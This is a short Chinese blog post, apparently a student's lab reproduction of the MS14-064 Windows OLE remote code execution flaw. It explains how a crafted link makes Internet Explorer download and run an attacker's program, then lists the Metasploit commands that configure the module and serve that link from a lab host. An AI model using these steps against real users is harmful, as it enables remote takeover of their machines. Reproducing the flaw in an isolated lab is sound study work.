✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :内网安全-漏洞复现
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
文章目录
- 一、原理
- 二、实验环境
- 三、漏洞复现
一、原理
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。
生成一个恶意链接,让用户点击后,用户的ie浏览器会执行操作:访问攻击者指定的ip下载并执行恶意程序,当用户执行恶意程序后,攻击者就能链接到用户的电脑。
二、实验环境
攻击机:kali ip:192.168.204.128
靶机:win10 ip:192.168.204.132
工具kali MSF
三、漏洞复现
1、打开kali 进入MSF框架
2、找到MS14-064漏洞
search ms14-064
use 0
3、查看当前模块参数
show options
4、设置参数
set AllowPowershellPrompt true
set srvhost 192.168.204.128
//设置服务器地址ip
5、查看和设置可攻击目标
show targets
set targets 1
6、执行获得恶意链接
run
exploit
恶意链接:
[http://192.168.204.128:8080/9hA6xv](http://192.168.204.128:8080/9hA6xv)